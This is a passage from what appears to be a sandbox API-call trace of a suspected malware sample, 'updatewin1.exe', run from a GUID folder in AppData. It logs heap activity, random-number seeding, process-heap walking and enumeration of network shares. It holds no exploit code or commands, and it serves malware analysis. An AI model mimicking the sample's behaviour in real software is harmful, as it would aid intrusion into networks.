Flags=0x0, Size=0x10000) returned 0x9ad6f98 [0143.239] SetFilePointer (in: hFile=0x700, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0143.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x32830c8 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x325c1f0 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x9ac3460 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac69d8 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x323e0b0 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x9ac6990 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6a08 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6a20 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x323e0d0 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x9ac6a38 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6a50 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6a68 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283da8 [0143.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6a80 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6a98 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6ab0 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6ac8 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x328c648 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3255a48 [0143.240] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3255a48, Size=0x218) returned 0x9ac6090 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3290eb8 [0143.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6a98 | out: hHeap=0x620000) returned 1 [0143.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6ac8 | out: hHeap=0x620000) returned 1 [0143.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6ab0 | out: hHeap=0x620000) returned 1 [0143.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x328c648 | out: hHeap=0x620000) returned 1 [0143.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6ab0 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3263540 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x9ac6ac8 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x323e0f0 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x9ac6a98 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3263580 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3282668 [0143.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x9ac33a0 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x323e130 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x32425b8 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x323e110 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x32635a0 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3282668 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6ac8 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3263580 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6a98 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x323e0f0 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3263540 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6ab0 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17a8 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac3460 | out: hHeap=0x620000) returned 1 [0143.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac6090 | out: hHeap=0x620000) returned 1 [0143.241] GetCurrentThreadId () returned 0x360 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x190) returned 0x327da28 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b1b8 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283df0 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x9ac6ab0 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3282668 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x6831c0 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x3272388 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681a90 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x31ed1b8 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3263540 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3263580 [0143.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x31ec580 [0143.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0143.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0143.242] GetCurrentThreadId () returned 0x360 [0143.242] GetVersionExA (in: lpVersionInformation=0x9dbf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x9dbf3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x9dbf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0143.242] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x77710000 [0143.242] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0143.242] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x741e0000 [0144.624] GetProcAddress (hModule=0x741e0000, lpProcName="NetStatisticsGet") returned 0x741e644f [0144.624] GetProcAddress (hModule=0x741e0000, lpProcName="NetApiBufferFree") returned 0x742113d2 [0144.625] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x9dbf02c | out: Buffer=0x9dbf02c) returned 0x0 [0144.654] GetCurrentThreadId () returned 0x360 [0144.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.654] NetApiBufferFree (Buffer=0x6879c8) returned 0x0 [0144.654] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x9dbf02c | out: Buffer=0x9dbf02c) returned 0x0 [0144.659] GetCurrentThreadId () returned 0x360 [0144.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.659] NetApiBufferFree (Buffer=0x9ac3460) returned 0x0 [0144.659] FreeLibrary (hLibModule=0x741e0000) returned 1 [0144.662] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0144.662] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0144.663] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0144.663] CryptAcquireContextW (in: phProv=0x9dbf018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9dbf018*=0x681a08) returned 1 [0144.664] CryptGenRandom (in: hProv=0x681a08, dwLen=0x40, pbBuffer=0x9dbf464 | out: pbBuffer=0x9dbf464) returned 1 [0144.664] GetCurrentThreadId () returned 0x360 [0144.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.665] CryptReleaseContext (hProv=0x681a08, dwFlags=0x0) returned 1 [0144.665] CryptAcquireContextW (in: phProv=0x9dbf018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x9dbf018*=0x681a08) returned 0 [0144.665] FreeLibrary (hLibModule=0x77710000) returned 1 [0144.665] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0144.665] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0144.666] GetDesktopWindow () returned 0x10010 [0144.666] GetProcessWindowStation () returned 0x48 [0144.666] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x9dbefa0 | out: pvInfo=0x0, lpnLengthNeeded=0x9dbefa0) returned 0 [0144.666] GetLastError () returned 0x7a [0144.666] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x9dbef80, nLength=0x10, lpnLengthNeeded=0x9dbefa0 | out: pvInfo=0x9dbef80, lpnLengthNeeded=0x9dbefa0) returned 1 [0144.666] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0144.666] GetProcAddress (hModule=0x77130000, lpProcName="GetForegroundWindow") returned 0x77152320 [0144.667] GetProcAddress (hModule=0x77130000, lpProcName="GetCursorInfo") returned 0x771a812f [0144.667] GetProcAddress (hModule=0x77130000, lpProcName="GetQueueStatus") returned 0x77153924 [0144.667] GetForegroundWindow () returned 0x10262 [0144.667] GetCurrentThreadId () returned 0x360 [0144.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.667] GetCursorInfo (in: pci=0x9dbf450 | out: pci=0x9dbf450) returned 1 [0144.667] GetQueueStatus (flags=0xbf) returned 0x0 [0144.668] GetCurrentThreadId () returned 0x360 [0144.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.668] FreeLibrary (hLibModule=0x77130000) returned 1 [0144.668] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0144.668] GetProcAddress (hModule=0x76d30000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0144.669] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0144.669] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0144.669] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0144.669] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0144.670] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0144.670] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0144.670] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0144.671] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0144.671] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0144.671] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0144.671] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x70c [0144.691] GetTickCount () returned 0x116d1b3 [0144.691] Heap32ListFirst (hSnapshot=0x70c, lphl=0x9dbf454) returned 1 [0144.692] GetCurrentThreadId () returned 0x360 [0144.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.692] Heap32First (lphe=0x9dbefc0, th32ProcessID=0x958, th32HeapID=0x620000) returned 1 [0144.726] GetCurrentThreadId () returned 0x360 [0144.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.726] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.754] GetTickCount () returned 0x116d1f1 [0144.754] GetCurrentThreadId () returned 0x360 [0144.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.754] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.778] GetTickCount () returned 0x116d210 [0144.778] GetCurrentThreadId () returned 0x360 [0144.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.778] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.805] GetTickCount () returned 0x116d22f [0144.805] GetCurrentThreadId () returned 0x360 [0144.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.805] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.832] GetTickCount () returned 0x116d23f [0144.832] GetCurrentThreadId () returned 0x360 [0144.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.832] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.858] GetTickCount () returned 0x116d25e [0144.858] GetCurrentThreadId () returned 0x360 [0144.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.858] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.883] GetTickCount () returned 0x116d27d [0144.883] GetCurrentThreadId () returned 0x360 [0144.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.883] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.909] GetTickCount () returned 0x116d28d [0144.909] GetCurrentThreadId () returned 0x360 [0144.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.909] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.935] GetTickCount () returned 0x116d2ac [0144.935] GetCurrentThreadId () returned 0x360 [0144.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.935] Heap32Next (lphe=0x9dbefc0) returned 1 [0144.963] GetTickCount () returned 0x116d2cb [0144.963] GetCurrentThreadId () returned 0x360 [0144.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0144.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0144.963] Heap32Next (lphe=0x9dbefc0) returned 1 [0145.015] GetTickCount () returned 0x116d2fa [0145.015] GetCurrentThreadId () returned 0x360 [0145.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0145.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0145.015] Heap32Next (lphe=0x9dbefc0) returned 1 [0145.047] GetTickCount () returned 0x116d319 [0145.047] GetCurrentThreadId () returned 0x360 [0145.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0145.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0145.047] Heap32Next (lphe=0x9dbefc0) returned 1 [0145.078] GetTickCount () returned 0x116d339 [0145.078] GetCurrentThreadId () returned 0x360 [0145.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0145.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0145.078] Heap32Next (lphe=0x9dbefc0) returned 1 [0145.106] GetTickCount () returned 0x116d358 [0145.106] GetCurrentThreadId () returned 0x360 [0145.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0145.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0145.106] Heap32Next (lphe=0x9dbefc0) returned 1 [0145.131] GetTickCount () returned 0x116d377 [0145.132] GetCurrentThreadId () returned 0x360 [0145.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6f9a98 [0145.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6f9a98 | out: hHeap=0x620000) returned 1 [0145.132] Heap32Next (lphe=0x9dbefc0) Thread: id = 87 os_tid = 0xabc [0126.084] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x9effee0 | out: lphEnum=0x9effee0*=0x32492a0) returned 0x0 [0127.537] WNetEnumResourceW (in: hEnum=0x32492a0, lpcCount=0x9effedc, lpBuffer=0x328ceb0, lpBufferSize=0x9effed8 | out: lpcCount=0x9effedc, lpBuffer=0x328ceb0, lpBufferSize=0x9effed8) returned 0x0 [0127.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223138 [0127.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223498 [0127.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3280af8 [0127.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x32836e8 [0127.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x32836a0 [0127.537] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x328ceb0, lphEnum=0x9effe28 | out: lphEnum=0x9effe28*=0x31fce60) returned 0x0 [0127.560] WNetEnumResourceW (in: hEnum=0x31fce60, lpcCount=0x9effe24, lpBuffer=0x9abd080, lpBufferSize=0x9effe20 | out: lpcCount=0x9effe24, lpBuffer=0x9abd080, lpBufferSize=0x9effe20) returned 0x103 [0127.560] WNetCloseEnum (hEnum=0x31fce60) returned 0x0 [0127.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223498 | out: hHeap=0x620000) returned 1 [0127.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223138 | out: hHeap=0x620000) returned 1 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223138 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223498 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3289ec8 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3222fd0 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283a90 [0127.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32836a0 | out: hHeap=0x620000) returned 1 [0127.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32836e8 | out: hHeap=0x620000) returned 1 [0127.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280af8 | out: hHeap=0x620000) returned 1 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x32836e8 [0127.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x32836a0 [0127.561] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x328ced0, lphEnum=0x9effe28) Thread: id = 89 os_tid = 0x544 Process: id = "7" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" page_root = "0x3a94a000" os_pid = "0x5b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x958" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0x3c4 [0128.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xc2694e10, dwHighDateTime=0x1d62438)) [0128.908] GetCurrentProcessId () returned 0x5b0 [0128.908] GetCurrentThreadId () returned 0x3c4 [0128.908] GetTickCount () returned 0x1154818 [0128.908] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24931114853) returned 1 [0128.924] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0128.924] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1d80000 [0128.926] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.926] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0128.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0128.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0128.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0128.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.929] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.929] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.929] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x214) returned 0x1d807d0 [0128.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.930] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.930] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.930] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.930] GetCurrentThreadId () returned 0x3c4 [0128.930] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, 